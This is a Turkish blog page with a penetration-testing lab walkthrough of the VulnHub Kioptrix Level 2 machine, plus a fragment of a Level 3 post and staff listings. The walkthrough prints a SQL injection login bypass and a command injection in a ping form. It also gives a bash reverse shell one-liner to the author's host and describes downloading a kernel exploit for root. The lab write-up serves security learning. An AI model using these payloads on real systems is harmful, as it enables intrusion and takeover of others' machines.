ne yazıyordu ? Sızma testi örnekleri serisinin ilk yazısında lotuscms in nasıl sömürüleceğinden bahsetmiştim.Aynen devam. İnteraktif shell e geçmek için ; Son olarak nikto ile tarama yaptığımda ve tabi nmap sonucunda da çıktığı üzere phpmyadmin vardı. makinede /www/kioptrix3.com/gallery dizini altında bulunan gconfig.php yi açtığımda phpmyadmin giriş bilgilerini elde ettim. Phpmyadmin e girip bilgileri kullandığımda başarılı oldum....
Sızma Testi Örnekleri:Kioptrix Level 2
Nisan 23, 2020
Siber Güvenlik
Kioptrix serisinin ikinci yazısında ilk makine kadar kolay olmasa da kolay sayılabilecek level 2 makinesinin çözümünü anlatacağım. Bu makinenin çözümü ilkine göre daha zevkli ve öğretici. Kioptrix level 2 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ Herzaman ki gibi işe makinenin ip adresinin bulmakla başlayalım.Bunun için netdiscover kullanacağım. Nmap taraması ile hangi portların açık olduğuna bir bakalım. İlk önce web uygulamasına bakalım.Karşımıza böyle bir giriş ekranı çıkacak. Birkaç giriş (admin-admin, admin-root) denemem işe yaramadı.sonra sql injection varmı diye kontrol ettim ve giriş yapmayı başardım. ‘or’kb’=’kb Karşımıza böyle bir ekran çıktı ve bize ping atılacak makineyi soruyor.Böyle şartlarda code execution aramak gerekir. ;ls Code execution olduğu aşikar 🙂 beni pingit.php ye yönlendirdi ve dizindeki dosyaları listeledi. Madem codex var o zaman reverse shell alalım ne duruyoruz.Ping atma inputuna şu komutçuğu girerek kendi makinemize (172.20.10.4) 7777.porttan istek atıyoruz Ve bu sırada nc ile bu portu dinliyoruz. ; bash -i >& /dev/tcp/172.20.10.4/7777 0>&1 Gördüğünüz gibi shell almayı başardık.Şimdi sıra hak yükseltmede.Bunun için bulunduğum dizine bir bakıyorum Ve index.php olduğunu görüp cat ile içine bakıyorum.İçinde bizim için önemli olabilecek bir bilgi var.Mysql bağlantısı yaptığı kullanıcı adı ve şifresi. Aynı şekilde bu bilgilerin sistem kullanıcı adı ve parolası olabileceğini düşünüp deniyorum.Tabi işe yaramadı. Bu bilgilerle mysql e bağlanıp kritik bilgilerin olup olmadığına bakalım. webapp veritabanına girip kullanıcılara bakalım. Bu bilgileri ssh bağlantısı yapıp kullandım fakat işe yaramadı.Pekala şimdi hak yükseltmemiz gerek.Root haklarına sahip olmak için gerekli exploit bilgisini çoğu zaman ben exploit suggester dan alıyorum.Exploit suggester ı makineye indirmek için kendi makinemde python ile bağlantı açıyorum ve hedef makineden wget ile suggester ı çekiyorum. Kendi makinemde ; Hedef makinede; Exploit suggester ı çalıştırdıktan sonra çıkan exploitler bir işe yaramadı. Ama çekirdek bilgisini searchsploit de aradıktan sonra işe yarar güzel bir exploit buldum. Exploiti -m parametresi ile bulunduğum dizine kopyalıyorum ve tekrardan bağlantı açıyorum. wget ile hedef makineye indirip çalıştırdığımda root haklarına sahip olmuş oluyorum. 🙂 Sızma Testi Örnekleri:Kioptrix level 1...
Yaptığımız röportajları Okumaya Ne Dersiniz?
RÖPORTAJLAR
Ekibimiz
Sizler de ekibimize katılmak istiyorsanız bizimle iletişime geçebilirsiniz.
Emre
Yılmaz
Kurucu
Yunus Emre
Öztürk
Kurucu | Yazar | Geliştirici | Pentester
Serpil
Kılıç
Yazar | Adli Bilişim Müh.
Dilara
Biçen
Yazar
Ömer Hasan
Durmuş
Yazar | Pentester
Emirhan
ÇİFÇİ
Yazar
Sena
Tunca
Çevirmen
Hüseyin
Yüksel
Çevirmen
Mehmet
Öztoprak
Editör
Musa
Öztürk
Editör
Mustafa
Dede
Grafiker
Projelerimize Göz Atmak İster Misiniz?
Projelerimiz
![[HTB] OpenAdmin WriteUp (10.10.10.171)](https://kernelblog.org/wp-content/uploads/2020/04/HTB-OpenAdmin-WriteUp-10.10.10.171.png)
